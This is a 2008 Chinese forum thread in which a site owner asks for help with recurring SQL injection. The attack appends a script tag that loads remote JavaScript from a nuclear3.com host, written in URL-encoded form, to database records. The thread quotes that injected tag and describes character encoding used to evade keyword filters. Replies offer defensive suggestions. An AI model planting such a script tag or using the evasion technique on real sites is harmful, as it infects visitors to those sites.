急，连续遭到nuclear3.com的注入攻击(100分)

N

NewLearner

Unregistered / Unconfirmed

GUEST, unregistred user!

• 2008-12-07

• #1

就在最近一个月发生。现在连新浪读书频道，msn中国，东方财经网，红袖添香都和我一样一直被攻击着。都是在我的MSSQL数据的结尾加上了他的一段代码，类似&lt;Script Src=http://c.nuclea%723.com/css/c.js&gt;&lt;/Script&gt;<br>每次清除后，又再被注入。听说是利用了字符的变形，比如update这个字符，他可以用类似%63这样的字符来代替，一个update就有两百多种组合，所以无论你怎么过滤他都可以变换，都不知道要怎么办了<br>有没有人知道 nu%63%6Cear3 这是什么表示法？

 

K

kia2004

Unregistered / Unconfirmed

GUEST, unregistred user!

• 2008-12-08

• #2

不知道，不过建议看下js中关于字符变换的书吧，或许会有答案。

 

K

kinneng

Unregistered / Unconfirmed

GUEST, unregistred user!

• 2008-12-08

• #3

报警，把nuclear3.查封

 

N

NewLearner

Unregistered / Unconfirmed

GUEST, unregistred user!

• 2008-12-08

• #4

网站能上传的目录都设了虚拟目录禁止运行程序，其余目录都是只读，web服务器上只能通过内网访问到数据库服务器，也并没使用SA访问。<br>用了各种防SQL注入的代码，又把每个页面只要涉及SQL语句的，都过滤了关键字，SQL数据库也改了端口和访问密码，都不行，他仍然攻击自如<br>这到底是怎么回事啊

 

X

XF.Lian

Unregistered / Unconfirmed

GUEST, unregistred user!

• 2008-12-23

• #5

ARP欺骗, 让你的服务器托管商检查下你IP所在网关范围内的机器,同一个网段的机器可能对你的服务器进行了ARP攻击

 

L

lqcros

Unregistered / Unconfirmed

GUEST, unregistred user!

• 2008-12-24

• #6

把存入的东西，全部屏蔽 script<br>发现有 Script 这种脚本，就不准他保存，只准保存文字